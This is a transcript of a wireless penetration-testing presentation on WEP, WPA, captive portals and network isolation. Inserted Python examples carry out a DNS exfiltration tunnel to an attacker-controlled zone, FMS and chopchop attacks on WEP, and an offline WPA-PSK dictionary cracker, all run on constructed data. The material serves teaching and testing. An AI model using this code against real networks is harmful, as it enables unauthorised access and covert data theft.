Wireless Pentesting: It's more than cracking WEP

Post on 02-Jul-2015


description

This presentation walks you through the fundamentals of attacking and defending wireless networks. Attacking WEP, WPA, WPA2, WPA Enterprise and captive portals is covered, and this presentation will be updated periodically, so keep checking back for updates.

transcript

Strategic Security, Inc. © http://www.strategicsec.com/

Wireless Penetration Testing is More Than Cracking WEP

Presented By: Joe McCray

Hmmm......Interesting


Anybody Hungry???


Don't Worry About Turning Off Your Phones For This Presentation. I'll Take Care Of That For You.

Now What Day Did You Say You Checked In?


What If I Want Percocet More Than Every 4 Hours?

I Want To Join The Group Too: The Domain Admin Group.


How Did You Do All Of This?

1. Scope of Wireless Penetration Testing

2. Methodology

3. Tools of the trade

4. Peeling The Onion of a Wireless Network

5. It's all about the data

Agenda


1. Reconnaissance Phase

2. Attack (Penetration Testing) Phase

3. Range Survey Phase

4. Reporting

Methodology


1. Initial Observations

Conducted on foot or in a car, using a handheld device or laptop to gather signal strength and a listing of available wireless networks.

2. Analysis of available networks

Silently gather information about WAPs and the clients using each WAP.

- Determine whether each network is in scope for the assessment.

3. Gather Network and AP Information

Gather details for all networks under test.

- Use packet captures to record traffic passing over the network.

Reconnaissance Phase

1. Use the data gathered in the recon phase to build a prioritized list of targets.

2. Survey and sniff open access points (if available).

3. Break WEP/WPA encryption where it is in use.

4. Prepare a fake RADIUS server for WPA-Enterprise (802.1X) networks.

5. Launch MITM attacks.

6. Use other attack patterns as appropriate.

Attack (Penetration Testing) Phase
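Step 1 of the attack phase, turning the recon data into a prioritized target list, as an added example (not from the deck). It assumes the recon was done with airodump-ng writing a CSV (`airodump-ng -w <prefix>`), whose file has an access-point table, a blank line, then a station table. The CSV text embedded below is constructed sample data in that layout, not a real capture, and the scope lists and scoring weights are the example's own assumptions.

```python
"""Added example (not from the deck): parse an airodump-ng CSV into a scoped target list.

Assumes the capture came from `airodump-ng -w <prefix>`, which writes <prefix>-01.csv
as an access-point table, a blank line, then a station table. SAMPLE_CSV is constructed
sample data in that layout, not a real capture.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2015-07-02 09:00:00, 2015-07-02 09:10:00,  6, 54, WPA2, CCMP, MGT, -45, 120,   0,   0.  0.  0.  0,  8, CorpWiFi, 
00:11:22:AA:BB:02, 2015-07-02 09:00:00, 2015-07-02 09:10:00,  6, 54, WEP, WEP, , -52,  98, 311,   0.  0.  0.  0, 10, CorpLegacy, 
00:11:22:AA:BB:03, 2015-07-02 09:00:00, 2015-07-02 09:10:00, 11, 54, WPA2 WPA, CCMP TKIP, PSK, -60,  77,   0,   0.  0.  0.  0,  7, , 
00:11:22:AA:BB:04, 2015-07-02 09:00:00, 2015-07-02 09:10:00,  1, 54, OPN, , , -70,  40,   0,   0.  0.  0.  0,  9, CorpGuest, 
DE:AD:BE:EF:00:01, 2015-07-02 09:00:00, 2015-07-02 09:10:00,  1, 54, WPA2, CCMP, PSK, -80,  30,   0,   0.  0.  0.  0, 11, Hotel-Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:00:00:01, 2015-07-02 09:01:00, 2015-07-02 09:09:00, -50, 210, 00:11:22:AA:BB:02, CorpLegacy
AA:AA:AA:00:00:02, 2015-07-02 09:02:00, 2015-07-02 09:09:00, -55,  40, 00:11:22:AA:BB:03, CorpIoT
AA:AA:AA:00:00:03, 2015-07-02 09:03:00, 2015-07-02 09:08:00, -65,  12, (not associated), CorpWiFi,HomeNet
"""

def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts keyed by the CSV header names."""
    ap_part, _, sta_part = text.strip().partition("\n\n")

    def rows(part):
        reader = csv.reader(io.StringIO(part), skipinitialspace=True)
        header = [h.strip() for h in next(reader)]
        out = []
        for r in reader:
            if not r:
                continue
            r = [f.strip() for f in r]
            # airodump-ng does not quote the probe list, so its commas spill into
            # extra columns; fold them back into the last header column.
            if len(r) > len(header):
                r = r[:len(header) - 1] + [",".join(r[len(header) - 1:])]
            out.append(dict(zip(header, r)))
        return out

    return rows(ap_part), rows(sta_part)

# Lower score = quicker win. Mixed-mode APs ("WPA2 WPA") are scored on the weaker mode.
BASE_SCORE = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3}

def attack_score(ap):
    score = min(BASE_SCORE.get(tok, 4) for tok in ap["Privacy"].split())
    if "TKIP" in ap["Cipher"].split():
        score -= 0.25      # the older cipher is still accepted
    if ap["Authentication"] == "MGT":
        score += 0.5       # 802.1X/EAP: needs a rogue RADIUS or client creds, not a PSK crack
    return score

def in_scope(ap, scope_essids, scope_ouis):
    return ap["ESSID"] in scope_essids or ap["BSSID"].upper()[:8] in scope_ouis

def prioritise(aps, stations, scope_essids, scope_ouis):
    """Rank in-scope APs and attach the recon facts the attack phase needs."""
    targets = []
    for ap in aps:
        if not in_scope(ap, scope_essids, scope_ouis):
            continue
        clients = [s for s in stations if s["BSSID"] == ap["BSSID"]]
        notes = []
        if ap["ESSID"] == "" and ap["ID-length"] != "0":
            # Hidden SSID: clients still send the name in probe/association frames.
            guesses = {p for s in clients for p in s["Probed ESSIDs"].split(",")
                       if len(p) == int(ap["ID-length"])}
            notes.append("hidden SSID, likely: %s" % ", ".join(sorted(guesses)))
        if clients:
            notes.append("MAC-filter bypass candidate: %s" % clients[0]["Station MAC"])
        if "WEP" in ap["Privacy"].split():
            notes.append("%s IVs captured so far" % ap["# IV"])
        targets.append({"bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": ap["channel"],
                        "score": attack_score(ap),
                        "clients": [c["Station MAC"] for c in clients], "notes": notes})
    return sorted(targets, key=lambda t: (t["score"], -len(t["clients"])))

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for target in prioritise(aps, stations, {"CorpWiFi", "CorpGuest"}, {"00:11:22"}):
        print(target)
```

The OUI-based scope rule is what keeps the hidden AP in play: it has no ESSID to match, but its BSSID prefix says it is the customer's hardware, and the probe from its associated client gives away the name.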

1. Survey with a typical wireless card, omni-directional antenna, and GPS.

2. Survey with a typical wireless card, directional antenna, and GPS.

3. Generate signal maps using the gathered data and a mapping utility.

Range Survey Phase

Customers tend to implement the following:

1. Configuration parameter ambiguity

2. 802.11 Wireless Authentication

3. 802.11 Wireless Encryption

4. Wireless Network Isolation

5. Wireless Client Isolation

....Just remember that we're on offense. We're pentesters.

Peeling Back The Layers

Configuration Parameter Ambiguity

- SSID Broadcast Disabled

- MAC Address Filtering

Configuration Ambiguity


Wireless Authentication

WEP -- Poorest

Cisco's LEAP -- Poor

WPA-PSK -- Better

WPA-Enterprise -- Best

Wireless Authentication


Wireless Encryption

WEP -- Poorest

WPA (TKIP) -- Better

WPA2 (AES) -- Best

Wireless Encryption


Wireless Network Isolation

Zero Separation -- Poorest

Layer 3 Routed Boundary -- Poor

Firewalled Boundary -- Better

VPN Concentrator -- Best

Wireless Separation


Zero Separation is all too common.

Countless times I see wireless networks that are basically bridged to the LAN. There is no work required for me to get to the LAN.

Wireless Network Isolation

Layer 3 Routed Boundary is almost as common.

Your best shot here is using EXTREMELY specific ACLs, and to be honest that doesn't help much either.

Wireless Network Isolation

Used commonly in Hotels, Airports, Coffee Shops, etc.

2 primary bypass methods:

- Impersonating an authorized wireless client (spoof the MAC and IP of a client that has already authenticated to the portal)

- Tunneling traffic out of the network via DNS or ICMP (protocols the portal typically lets through before authentication)

Captive Portal
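What the second bypass looks like on the wire, as an added example (not from the deck): data packed into DNS query names for a zone the attacker controls, with the server side unpacking it, plus the check a defender would run over resolver logs. Both ends are plain functions so the RFC 1035 limits (63 bytes per label, 253 per name) are visible; no packets are sent. TUNNEL_DOMAIN and the payload are made-up sample values.

```python
"""Added example (not from the deck): tunnelling data out through DNS, the way a captive
portal bypass does, plus a defender-side detection heuristic.

No packets are sent: both ends are plain functions so the wire-format limits
(63 bytes per label, 253 per name) are visible. TUNNEL_DOMAIN and the payload are
made-up sample values; in a real bypass the zone's authoritative server is the attacker's.
"""
import base64
import collections
import math

TUNNEL_DOMAIN = "t.example.net"   # assumed attacker-controlled zone
MAX_LABEL = 63                    # RFC 1035 limits
MAX_NAME = 253
CHUNK = 39                        # 39 bytes -> 63 unpadded base32 characters, one full label
LABELS_PER_QUERY = 3

def encode_queries(data, domain=TUNNEL_DOMAIN):
    """Client side: pack `data` into names of the form s<seq>.<label>.<label>.<label>.<domain>."""
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
    names = []
    for seq, start in enumerate(range(0, len(chunks), LABELS_PER_QUERY)):
        # base32, lower-cased and unpadded: DNS names are case-insensitive and '=' is not a
        # legal hostname character.
        labels = [base64.b32encode(c).decode().rstrip("=").lower()
                  for c in chunks[start:start + LABELS_PER_QUERY]]
        name = ".".join(["s%d" % seq] + labels + [domain])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError("query name exceeds RFC 1035 limits")
        names.append(name)
    return names

def _b32decode(label):
    text = label.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))

def decode_queries(names, domain=TUNNEL_DOMAIN):
    """Server side: strip the zone, reorder by sequence number (UDP may reorder), unpack."""
    parts = {}
    for name in names:
        labels = name[:-(len(domain) + 1)].split(".")
        seq = int(labels[0][1:])
        parts[seq] = b"".join(_b32decode(label) for label in labels[1:])
    return b"".join(parts[seq] for seq in sorted(parts))

def tunnel_score(name, zone_labels=2):
    """Defender heuristic over a query name: length and Shannon entropy of everything
    below the registered zone. Ordinary hostnames are short and low-entropy."""
    sub = "".join(name.split(".")[:-zone_labels])
    if not sub:
        return 0.0, 0
    counts = collections.Counter(sub)
    entropy = -sum(n / len(sub) * math.log2(n / len(sub)) for n in counts.values())
    return entropy, len(sub)

def looks_like_tunnel(name, zone_labels=2):
    entropy, length = tunnel_score(name, zone_labels)
    return length > 40 and entropy > 3.0

if __name__ == "__main__":
    sample = bytes(range(256)) + b" constructed sample payload"
    for n in encode_queries(sample):
        print(len(n), looks_like_tunnel(n), n[:60] + "...")
    assert decode_queries(encode_queries(sample)) == sample
```

The thresholds in `looks_like_tunnel` are a starting point, not a signature: CDN and cloud hostnames with hashed labels will trip it, so in practice it is combined with query volume per zone and the ratio of NXDOMAIN/TXT responses.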

Firewalled Boundary is much less common.

In my opinion the only thing you really get with this over the routed boundary is better logging.

Wireless Network Isolation

VPN Concentrator is even less common, but it's probably your best option if you find that packet overhead isn't affecting business operations. This can really slow down your network.

Wireless Network Isolation

Let's start with the simple stuff....

Simple security mechanisms suck

- SSID Broadcast disabled

- MAC Address Filtering

Wireless Traffic That Reveals Confidential Information

Rogue Access Points

- Employees deploying rogue APs

- Malicious attackers deploying rogue APs

OK – I'm Bored – Let's Do Some Hacking

WEP was the first encryption standard available for wireless networks. WEP can be deployed in two strengths, 64-bit and 128-bit. 64-bit WEP consists of a 40-bit secret key and a 24-bit initialization vector, and is often referred to as 40-bit WEP. 128-bit WEP similarly employs a 104-bit secret key and a 24-bit initialization vector and is often called 104-bit WEP.

Association with WEP encrypted networks can be accomplished through the use of a password, an ASCII key, or a hexadecimal key. WEP's use of the RC4 algorithm (a static key with a short IV prepended to it, sent in the clear with every frame) was shown to be flawed, allowing an attacker to recover the key and compromise WEP encrypted networks.

Attacking Wireless Authentication & Encryption Mechanisms

- WEP has been dead since 2001

- 2 primary methods of attacking WEP

- Collection of weak IVs

Certain IVs ("weak" IVs) put the RC4 Key Scheduling Algorithm (KSA) into a state where the first byte of keystream leaks a byte of the key, and the first keystream byte is always known because every 802.11 data frame starts with the same LLC/SNAP byte (0xAA). After somewhere between 1,500 and 5,000 weak IVs are collected, they can be fed back through the KSA and the first byte of the secret key is revealed by majority vote. This process is then repeated for each byte until the WEP key is cracked.

- Collection of unique IVs

Newer statistical attacks (PTW, the default in aircrack-ng) need no weak IVs at all, only tens of thousands of distinct ones, so the job becomes generating traffic. Chopchop supplies a packet to replay without knowing the key: the last byte of a captured WEP packet is removed, which breaks the Cyclic Redundancy Check/Integrity Check Value (CRC/ICV). For each guess of the removed plaintext byte there is a value which, XORed into the last four bytes of the shortened packet, makes the CRC valid again. The guess the AP accepts is the right one, so the packet is decrypted byte by byte and can then be retransmitted.

WEP IS DEAD!!!!!!!
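The weak-IV attack (Fluhrer, Mantin and Shamir) carried out end to end in simulation, as an added example that is not from the deck. Everything in it is constructed: a 5-byte (40-bit) key, one frame for each of the classic weak IVs (A+3, 255, X), and the attacker's voting. The only plaintext assumption is the real one, that the frame body starts with the LLC/SNAP byte 0xAA; the verification of a full key candidate against a frame's ICV is the same check aircrack-ng's fudge factor relies on.

```python
"""Added example (not from the deck): the FMS weak-IV attack on 40-bit WEP, simulated end to end.

Everything here is constructed: a 5-byte key, frames with the classic weak IVs (A+3, 255, X),
and the attacker's side. The one plaintext assumption is the real one: every 802.11 data
frame starts with the LLC/SNAP byte 0xAA, which gives the first keystream byte for free.
"""
import os
import zlib

SNAP_FIRST_BYTE = 0xAA

def rc4_ksa(key):
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s

def rc4_keystream(key, n):
    s, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(key, iv, plaintext):
    """WEP body = plaintext || CRC-32 ICV, XORed with RC4(IV || key)."""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return bytes(a ^ b for a, b in zip(body, rc4_keystream(bytes(iv) + key, len(body))))

def wep_icv_ok(key, iv, ciphertext):
    ks = rc4_keystream(bytes(iv) + key, len(ciphertext))
    body = bytes(a ^ b for a, b in zip(ciphertext, ks))
    return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]

def weak_iv_capture(key):
    """Constructed capture: one frame per weak IV (A+3, 255, X), A = index of the key byte."""
    plaintext = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x06]) + bytes(28)  # LLC/SNAP + ARP-sized body
    frames = []
    for a in range(len(key)):
        for x in range(256):
            iv = (a + 3, 255, x)
            frames.append((iv, wep_encrypt(key, iv, plaintext)))
    return frames

def vote_key_byte(frames, known):
    """FMS vote for key byte index len(known): run the KSA over the IV plus the bytes already
    recovered, keep only IVs that leave the state 'resolved', and turn the first keystream
    byte into a key-byte guess (right about 5% of the time, random otherwise)."""
    a = len(known)
    votes = [0] * 256
    for iv, ct in frames:
        k = list(iv) + list(known)
        s, j = list(range(256)), 0
        for i in range(a + 3):
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
            continue                               # not a resolved IV for this position
        out = ct[0] ^ SNAP_FIRST_BYTE              # first RC4 output byte
        votes[(s.index(out) - j - s[a + 3]) & 0xFF] += 1
    return votes

def fms_crack(frames, key_len=5, fudge=3, known=b""):
    """Depth-first over the top `fudge` candidates per byte; a full key is accepted only if
    it decrypts a captured frame to a valid ICV."""
    if len(known) == key_len:
        iv, ct = frames[0]
        return known if wep_icv_ok(known, iv, ct) else None
    votes = vote_key_byte(frames, known)
    for cand in sorted(range(256), key=lambda b: -votes[b])[:fudge]:
        key = fms_crack(frames, key_len, fudge, known + bytes([cand]))
        if key is not None:
            return key
    return None

if __name__ == "__main__":
    secret = os.urandom(5)
    recovered = fms_crack(weak_iv_capture(secret))
    print("real key %s  recovered %s" % (secret.hex(), recovered.hex()))
```

Two things the slide's one-liner hides are visible here: the "resolved" check is what separates a usable IV from one that only looks weak, and the voting is noisy enough that a practical tool never commits to one byte; it keeps a few candidates and lets the ICV check on a real frame settle it.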

WEP is dead continued...

The biggest problem with attacks against WEP is collecting enough packets. Traffic can be injected into the network to create more packets. This is usually accomplished by collecting one or more Address Resolution Protocol (ARP) packets and retransmitting them to the access point.

ARP packets are a good choice because they have a predictable size (a 28-byte ARP body, so they can be picked out of encrypted traffic by length alone) and the AP re-encrypts each replay with a fresh IV. The responses generate traffic and increase the speed at which packets are collected.

WEP IS DEAD!!!!!!!
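The chopchop technique from the previous slide, which is how an attacker gets a decryptable, replayable packet and the keystream to forge the ARP requests described here, as an added example that is not from the deck. The access point is simulated as an oracle that decrypts a frame and answers only "ICV valid" or not. Nothing in it depends on RC4: the oracle XORs with a fixed keystream (a constructed stand-in for RC4(IV || key)), because the weakness exploited is that a stream cipher plus a linear CRC lets an attacker edit ciphertext. The "certain value" the slide mentions is derived from the CRC-32 table and depends only on the guessed byte, never on the key.

```python
"""Added example (not from the deck): KoreK's chopchop against a simulated WEP access point.

The AP is an oracle: it decrypts with its keystream and accepts a frame only when the ICV
checks out. The keystream is a constructed stand-in for RC4(IV || key); the attack never
needs RC4, only that the cipher is XOR-based and the ICV is a plain CRC-32.
"""
import zlib

F = 0xFFFFFFFF

def _crc32_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

CRC_TABLE = _crc32_table()        # the same reflected table zlib.crc32 uses

def chop_mask(x):
    """After chopping a frame's last byte, XOR this into its last four bytes to make the
    ICV valid again. x = (CRC register of the shorter data ^ chopped plaintext byte) & 0xFF;
    the mask depends on nothing else, so the attacker simply tries all 256 values."""
    return ((CRC_TABLE[x] << 8) & F) ^ x ^ 0xFF

MASKS = [chop_mask(x).to_bytes(4, "little") for x in range(256)]

def xor_bytes(a, b):
    return bytes(p ^ q for p, q in zip(a, b))

class WepAccessPoint:
    """Oracle: decrypts with its keystream and answers only 'ICV valid' or not."""
    def __init__(self, keystream):
        self.keystream = keystream
        self.queries = 0
    def encrypt(self, data):
        return xor_bytes(data + zlib.crc32(data).to_bytes(4, "little"), self.keystream)
    def accepts(self, frame):
        self.queries += 1
        body = xor_bytes(frame, self.keystream)
        return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]

def chopchop(frame, ap, known_prefix=b"\xaa\xaa\x03"):
    """Recover the plaintext and keystream of one frame using only the oracle.
    known_prefix is the LLC/SNAP start every data frame shares; chopping stops there."""
    found = []                                   # accepted x for each chop, last byte first
    cur = frame
    while len(cur) > len(known_prefix) + 4:
        shorter = cur[:-1]
        for x in range(256):
            trial = shorter[:-4] + xor_bytes(shorter[-4:], MASKS[x])
            if ap.accepts(trial):
                found.append(x)
                cur = trial
                break
        else:
            raise RuntimeError("oracle accepted no candidate; not a WEP/CRC frame?")
    # Rebuild forwards: each byte = x ^ low byte of the CRC register over everything before it.
    data = known_prefix
    for x in reversed(found):
        data += bytes([x ^ ((zlib.crc32(data) ^ F) & 0xFF)])
    keystream = xor_bytes(frame, data + zlib.crc32(data).to_bytes(4, "little"))
    return data, keystream

def forge(keystream, data):
    """With this IV's keystream, any frame up to its length is encrypted without the key."""
    return xor_bytes(data + zlib.crc32(data).to_bytes(4, "little"), keystream)

if __name__ == "__main__":
    ap = WepAccessPoint(bytes((i * 73 + 11) & 0xFF for i in range(64)))   # constructed keystream
    frame = ap.encrypt(b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"constructed arp body")
    data, ks = chopchop(frame, ap)
    print(data, "in", ap.queries, "oracle queries")
    print("forged frame accepted:", ap.accepts(forge(ks, b"\xaa\xaa\x03\x00\x00\x00\x08\x06forged")))
```

On the air the oracle is the AP itself (it relays a frame with a good ICV and drops one without), which is why the attack costs at most 256 transmissions per byte and why the IV reuse WEP permits turns one recovered keystream into unlimited forged frames.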

WPA was developed to replace WEP because of the vulnerabilities associated with it. WPA can be deployed either using a pre-shared key (WPA-PSK) or in conjunction with a RADIUS server (WPA-Enterprise, also called WPA-RADIUS). WPA uses either the Temporal Key Integrity Protocol (TKIP) or the Advanced Encryption Standard (AES, via CCMP) for its encryption algorithm.

WPA-PSK is only as strong as the passphrase: a captured four-way handshake can be attacked offline with a dictionary. WPA2 (the full IEEE 802.11i standard) followed to further strengthen the encryption. The primary difference between WPA and WPA2 is that WPA2 mandates AES-CCMP and keeps TKIP only for backward compatibility, whereas WPA was built around TKIP with AES optional.

What About WPA??
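The offline attack on WPA/WPA2-PSK, as an added example that is not from the deck. The key derivation is the standard one from IEEE 802.11i (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32); PTK = PRF-512 over the two MACs and two nonces; KCK = first 16 bytes of the PTK; MIC over EAPOL message 2 with HMAC-MD5 for TKIP or HMAC-SHA1 for CCMP). The handshake itself is constructed in code from a known passphrase so the example runs offline; in practice the same fields come from a capture of EAPOL messages 1 and 2, and the MAC addresses, nonces and wordlist are made-up sample values.

```python
"""Added example (not from the deck): offline dictionary attack on a WPA/WPA2-PSK four-way handshake.

The handshake is constructed from a known passphrase so this runs offline; the field
layout and key derivation follow IEEE 802.11i. MACs, nonces and wordlist are sample values.
"""
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512. MACs and nonces are sorted so both sides derive the same key."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]

def eapol_mic(kck, eapol_frame, key_descriptor_version):
    """MIC over the whole EAPOL-Key frame with its MIC field (bytes 81..96) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    if key_descriptor_version == 1:                                  # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]         # WPA2 / CCMP

def build_eapol_msg2(snonce, key_descriptor_version, key_data=b""):
    """Minimal EAPOL-Key message 2 (supplicant -> AP) with the MIC field still zero."""
    key_info = (0x0100 | 0x0008 | key_descriptor_version).to_bytes(2, "big")  # MIC | pairwise | version
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 8 + snonce + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body

def constructed_handshake(passphrase, ssid, version=2):
    """The fields a capture of messages 1 and 2 would yield, built from a known passphrase."""
    ap_mac, sta_mac = bytes.fromhex("001122aabb01"), bytes.fromhex("aaaaaa000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed so the sample is deterministic
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_eapol_msg2(snonce, version)
    frame = frame[:81] + eapol_mic(ptk[:16], frame, version) + frame[97:]   # as seen on the air
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": frame, "version": version}

def crack_psk(hs, wordlist):
    """Each candidate costs one PBKDF2 (4096 SHA1 rounds) plus a PRF and one HMAC; the
    candidate whose KCK reproduces the captured MIC is the passphrase."""
    captured_mic = hs["eapol"][81:97]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["version"]), captured_mic):
            return candidate
    return None

if __name__ == "__main__":
    hs = constructed_handshake("Summer2015!", "CorpWiFi")
    print(crack_psk(hs, ["password", "CorpWiFi", "Summer2015!", "letmein"]))
```

Because the SSID is the PBKDF2 salt, precomputed tables only help for common network names, which is the one defensive lever a customer has short of moving to WPA-Enterprise: a long passphrase on a non-default SSID.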

WPA/WPA2 requires the use of an authentication piece in addition to the encryption piece. A form of the Extensible Authentication Protocol (EAP) is used for this piece. There are five EAP types certified for use with WPA/WPA2 Enterprise:

- EAP-TLS

- EAP-TTLS/MSCHAPv2

- PEAPv0/EAP-MSCHAPv2

- PEAPv1/EAP-GTC

- EAP-SIM

WPA Continued...

At the end of the day wireless penetration testing is really about verifying whether or not an attacker can gain access to your production network.

At its core it's no different than physical security testing. Can you get to the production network?

At The End Of The Day....It's All About The Data

If you have other questions you'd like to ask outside of this conference, or if you want to get a copy of my slides you can contact me at:

Email: joe@strategicsec.com

Twitter: @j0emccray

LinkedIn: http://www.linkedin.com/in/joemccray